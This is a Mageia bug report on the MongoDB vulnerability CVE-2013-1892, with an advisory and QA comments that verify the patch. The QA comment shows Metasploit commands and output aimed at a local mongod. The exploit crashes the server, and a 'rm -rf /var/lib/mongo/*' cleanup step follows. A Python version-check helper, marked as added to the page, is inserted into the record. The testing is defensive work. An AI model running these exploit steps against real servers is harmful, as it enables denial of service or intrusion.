Bug 9670 - mongodb new security issue CVE-2013-1892
Summary: mongodb new security issue CVE-2013-1892
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 2
Hardware: i586 Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/546486/
Whiteboard: has_procedure mga2-32-ok MGA2-64-OK
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2013-04-08 22:52 CEST by David Walser
Modified: 2013-04-18 00:24 CEST
CC List: 3 users

See Also:
Source RPM: mongodb-2.2.2-2.mga3.src.rpm
CVE:
Status comment:



Description David Walser 2013-04-08 22:52:19 CEST
Fedora has issued an advisory on March 29:
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html

Mageia 2 is also affected.

Reproducible: 

Steps to Reproduce:
David Walser 2013-04-08 22:52:25 CEST

Whiteboard: (none) => MGA2TOO

Comment 1 David Walser 2013-04-10 18:10:50 CEST
Patched packages uploaded for Mageia 2 and Cauldron.

Note to QA: exploits are available from a blog post linked in Red Hat's bug, and there's a Metasploit module available for this.

Advisory:
========================

Updated mongodb packages fix security vulnerability:

MongoDB 2.4.1 and earlier is prone to a remote code-injection vulnerability
because it fails to properly sanitize user-supplied input. An attacker can
exploit this vulnerability to inject and execute arbitrary code within the
context of the affected application (CVE-2013-1892).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1892
http://www.securityfocus.com/bid/58695/info
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html
========================

Updated packages in core/updates_testing:
========================
mongodb-2.0.3-4.1.mga2
mongodb-server-2.0.3-4.1.mga2

from mongodb-2.0.3-4.1.mga2.src.rpm

Version: Cauldron => 2
Assignee: fundawang => qa-bugs
Whiteboard: MGA2TOO => (none)

Comment 2 claire robinson 2013-04-11 15:53:34 CEST
Testing complete on i586 with metasploit and the exploit from here: http://www.securityfocus.com/bid/58695/exploit


Before
------
Edited /etc/mongod.conf and uncommented the port.

# service mongod start
Starting mongod (via systemctl):                     [  OK  ]

$ git clone https://github.com/bcoles/metasploit-framework.git metasploit

Save the exploit to metasploit/modules/exploits/linux/misc/

$ cd metasploit
$ ./msfconsole

msf > use exploit/linux/misc/58695
msf  exploit(58695) > set RHOST localhost
RHOST => localhost
msf  exploit(58695) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[+] Mongo server localhost doesn't use authentication
[+] New document created in collection atcf
[*] Let's exploit, heap spray could take some time...
[*] Exploit completed, but no session was created.

In another terminal..
$ mongo
MongoDB shell version: 2.0.3
connecting to: test
Thu Apr 11 14:28:03 Error: couldn't connect to server 127.0.0.1 shell/mongo.js:84
exception: connect failed

# systemctl restart mongod.service
# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: failed (Result: exit-code) since Thu, 11 Apr 2013 14:30:01 +0100; 2s ago
         Process: 12485 ExecStart=/usr/bin/mongod $OPTIONS --pidfilepath /var/run/mongo/mongo.pid run (code=exited, status=0/SUCCESS)
        Main PID: 12488 (code=exited, status=100)
          CGroup: name=systemd:/system/mongod.service

So it appears we're not vulnerable to the remote code execution, but it does kill the server, so it's still a DoS. It also prevents the server from being restarted without rm -rf /var/lib/mongo/*

Reading https://bugzilla.redhat.com/show_bug.cgi?id=928193#c2, Fedora found they were not vulnerable but don't mention the DoS.


After
-----
# rm -rf /var/lib/mongo/*
# systemctl restart mongod.service
# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: active (running) since Thu, 11 Apr 2013 14:36:25 +0100; 2s ago

$ mongo
MongoDB shell version: 2.0.3
connecting to: test
> exit
bye

Testing with metasploit again..

msf  exploit(58695) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[+] Mongo server localhost doesn't use authentication
[+] New document created in collection zqgr
[*] Let's exploit, heap spray could take some time...
[*] Exploit completed, but no session was created.

# systemctl status mongod.service
mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: active (running) since Thu, 11 Apr 2013 14:36:25 +0100; 2min 40s ago


So the update prevents the DoS and the CVE is closed.

Testing with a few bits from here..
http://docs.mongodb.org/manual/tutorial/getting-started/

Dropping the admin database created by metasploit

> show dbs
admin   0.0625GB
local   (empty)
> use admin
switched to db admin
> db.dropDatabase()
{ "dropped" : "admin", "ok" : 1 }

Followed the Getting Started tutorial OK.

Whiteboard: (none) => has_procedure mga2-32-ok
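An added verification helper, written for this page and not taken from the bug report or from Mageia's own tooling: it compares an installed mongodb package's version-release against the fixed release named in the advisory (mongodb-2.0.3-4.1.mga2) using the rpmvercmp ordering, and reads the Active: state out of systemctl status output, which are the two observations the QA procedure above leans on. The rpm -q sample output embedded in it is constructed; the pre-update release 2.0.3-4.mga2 it contains is an assumption, not a version named in the bug.

```python
# Added verification helper (not part of the bug report): checks installed
# mongodb packages against the fixed release from this bug's advisory and
# reads the service state from `systemctl status` output.
import re
import shutil
import subprocess

# Fixed version-release from the advisory in this bug (Mageia 2).
FIXED_EVR = "2.0.3-4.1.mga2"


def rpm_vercmp(a: str, b: str) -> int:
    """Compare two RPM version or release strings like librpm's rpmvercmp().

    Returns -1, 0 or 1. Runs of digits compare numerically, runs of letters
    compare lexically, a numeric segment beats an alphabetic one, and '~'
    marks a pre-release that sorts before everything, including end of string.
    """
    i = j = 0
    while i < len(a) or j < len(b):
        # separators (neither alphanumeric nor '~') are skipped
        while i < len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        ta = i < len(a) and a[i] == "~"
        tb = j < len(b) and b[j] == "~"
        if ta or tb:
            if not ta:
                return 1
            if not tb:
                return -1
            i += 1
            j += 1
            continue
        if i >= len(a) or j >= len(b):
            break
        # take one segment of the same kind (digits or letters) from each side
        isnum = a[i].isdigit()
        same_kind = str.isdigit if isnum else str.isalpha
        si, sj = i, j
        while i < len(a) and same_kind(a[i]):
            i += 1
        while j < len(b) and same_kind(b[j]):
            j += 1
        sa, sb = a[si:i], b[sj:j]
        if not sb:
            # kinds differ: a numeric segment is newer than an alphabetic one
            return 1 if isnum else -1
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def parse_nvra(pkg: str):
    """Split 'name-version-release.arch' as printed by `rpm -q` into its parts."""
    nvr, _arch = pkg.rsplit(".", 1)
    nv, release = nvr.rsplit("-", 1)
    name, version = nv.rsplit("-", 1)
    return name, version, release


def is_patched(version_release: str, fixed: str = FIXED_EVR) -> bool:
    """True when an installed version-release is at or above the fixed one."""
    return rpm_vercmp(version_release, fixed) >= 0


def check_packages(rpm_q_output: str, fixed: str = FIXED_EVR) -> dict:
    """Map each package named in `rpm -q` output to whether it carries the fix."""
    result = {}
    for line in rpm_q_output.splitlines():
        line = line.strip()
        if not line or line.endswith("is not installed"):
            continue
        name, version, release = parse_nvra(line)
        result[name] = is_patched(f"{version}-{release}", fixed)
    return result


def service_state(systemctl_status: str) -> str:
    """Return the word after 'Active:' in `systemctl status` output."""
    m = re.search(r"^\s*Active:\s*(\S+)", systemctl_status, re.MULTILINE)
    return m.group(1) if m else "unknown"


# Constructed sample in `rpm -q` NVRA format; 2.0.3-4.mga2 is an assumed
# pre-update release, not a version taken from the bug.
SAMPLE_RPM_Q = """mongodb-2.0.3-4.mga2.i586
mongodb-server-2.0.3-4.1.mga2.i586
"""

# Status header in the shape the QA comment shows for the crashed service.
SAMPLE_STATUS_FAILED = """mongod.service - High-performance, schema-free document-oriented database
          Loaded: loaded (/lib/systemd/system/mongod.service; enabled)
          Active: failed (Result: exit-code) since Thu, 11 Apr 2013 14:30:01 +0100; 2s ago
"""

if __name__ == "__main__":
    if shutil.which("rpm"):
        out = subprocess.run(["rpm", "-q", "mongodb", "mongodb-server"],
                             capture_output=True, text=True).stdout
    else:
        out = SAMPLE_RPM_Q
    for name, ok in check_packages(out).items():
        print(f"{name}: {'patched' if ok else 'NOT patched'}")
    print("mongod state:", service_state(SAMPLE_STATUS_FAILED))
```

On a Mageia 2 host the script queries rpm directly; elsewhere it falls back to the constructed sample, where only mongodb-server carries the fixed release. A service state of "failed" after the update would mean the crash path still exists, which is exactly what the second systemctl status check above rules out.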

Comment 3 Dave Hodgins 2013-04-11 23:11:09 CEST
Testing complete on Mageia 2 x86-64.

Could someone from the sysadmin team push the srpm
mongodb-2.0.3-4.1.mga2.src.rpm
from Mageia 2 Core Updates Testing to Core Updates?

Advisory: Updated mongodb packages fix security vulnerability:

MongoDB 2.4.1 and earlier is prone to a remote code-injection vulnerability
because it fails to properly sanitize user-supplied input. An attacker can
exploit this vulnerability to inject and execute arbitrary code within the
context of the affected application (CVE-2013-1892).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1892
http://www.securityfocus.com/bid/58695/info
http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101630.html

https://bugs.mageia.org/show_bug.cgi?id=9670

Keywords: (none) => validated_update
Whiteboard: has_procedure mga2-32-ok => has_procedure mga2-32-ok MGA2-64-OK
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 4 Thomas Backlund 2013-04-18 00:24:15 CEST
Update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0118

Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED
